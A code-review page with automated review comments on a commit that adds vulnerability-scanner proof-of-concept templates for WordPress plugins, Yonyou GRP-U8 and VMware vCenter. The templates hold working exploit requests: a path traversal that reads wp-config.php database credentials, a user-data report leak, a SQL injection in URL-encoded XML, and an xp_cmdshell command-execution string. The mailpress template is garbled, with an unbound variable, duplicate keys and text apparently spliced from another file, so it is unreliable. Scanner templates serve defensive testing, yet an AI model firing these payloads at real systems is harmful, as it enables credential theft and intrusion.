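Review bot: `links` in vmware-vcenter-arbitrary-file-read points at a `https://t.co/…` shortener, an opaque redirect that can expire or be repointed, so a reviewer cannot tell what the reference is without following it; replace it with the resolved advisory or write-up URL. It is also worth recording in `detail` that the check confirms by returning real file contents (`/etc/passwd` in the `linux` group, `vcdb.properties` in the `win` group), e.g. `info: confirms by reading /etc/passwd or vcdb.properties from the target`, so operators know the finding carries sensitive data.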
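Review bot: Both rules in vmware-vcenter-unauthorized-rce-cve-2021-21972 only establish that the vropspluginui endpoints exist (`405 Method Not Allowed` on `uploadova`, `200` with `States`/`Install Progress` on `getstatus`); neither observes the vulnerability itself, so this is a presence/fingerprint check and a host where the plugin is exposed but already patched could, as far as these two responses go, still match. State that in `detail`, e.g. `info: endpoint-presence check only; verify version/patch level before treating the host as exploitable`. An `Affected Version` entry alongside, as other templates in this commit carry, would help operators triage the result.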
@@ -0,0 +1,11 @@ +name: poc-yaml-wordpress-cve-2019-19985-infoleak +rules: + - method: GET + path: "/wp-admin/admin.php?page=download_report&report=users&status=all" + follow_redirects: false + expression: > + response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) +detail: + author: bufsnake(https://github.com/bufsnake) + links: + - https://www.exploit-db.com/exploits/48698 diff --git a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml new file mode 100644 index 0000000..a26f05d --- /dev/null +++ b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml @@ -0,0 +1,13 @@ +name: poc-yaml-wordpress-ext-adaptive-images-lfi +rules: + - method: GET + path: >- + /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php + follow_redirects: false + expression: > + response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") +detail: + author: FiveAourThe(https://github.com/FiveAourThe) + links: + - https://www.anquanke.com/vul/id/1674598 + - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 diff --git a/WebScan/pocs/wordpress-ext-mailpress-rce.yml b/WebScan/pocs/wordpress-ext-mailpress-rce.yml new file mode 100644 index 0000000..523b0f2 --- /dev/null +++ b/WebScan/pocs/wordpress-ext-mailpress-rce.yml 
@@ -0,0 +1,23 @@ +name: poc-yaml-wordpress-ext-mailpress-rce +set: + r: randomInt(800000000, 1000000000) + r1: randomInt(800000000, 1000000000) +rules: + - method: POST + path: "/wp-content/plugins/mailpress/mp-includes/action.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=&html=&plaintext=&mail_format=standard&autosave=1 + expression: "true" + search: | + XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: MrP01ntSun(https://github.com/MrPointSun) + links: + - https://www.hackbug.net/archives/111.html diff --git a/WebScan/pocs/yonyou-grp-u8-sqli.yml b/WebScan/pocs/yonyou-grp-u8-sqli.yml new file mode 100644 index 0000000..5fd8452 --- /dev/null +++ b/WebScan/pocs/yonyou-grp-u8-sqli.yml @@ -0,0 +1,15 @@ +name: poc-yaml-yonyou-grp-u8-sqli +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: /Proxy + body: > + cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html \ No newline at end of file
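Review bot: In wordpress-ext-mailpress-rce the `set` block defines `r` and `r1`, but `search` and the final `expression` reference `r1` and `r2`, so `r2` is unbound and `bytes(string(r1 * r2))` cannot evaluate; the first rule also carries two `expression` keys in one mapping (`expression: "true"` and a second `expression: |`), which a YAML loader will either reject or silently collapse. The hunk as shown is shorter than the 23 lines its `@@ -0,0 +1,23 @@` header announces and its `search` text (`exec xp_cmdshell …`) reads like the yonyou-grp-u8-sqli-to-rce.yml file that the diffstat lists but that has no hunk in this page, so this is probably two files merged during page extraction rather than what was committed; check the repository before acting on it. If the committed file really reads this way, make the `set` keys and the referenced names agree and keep a single `expression` per rule.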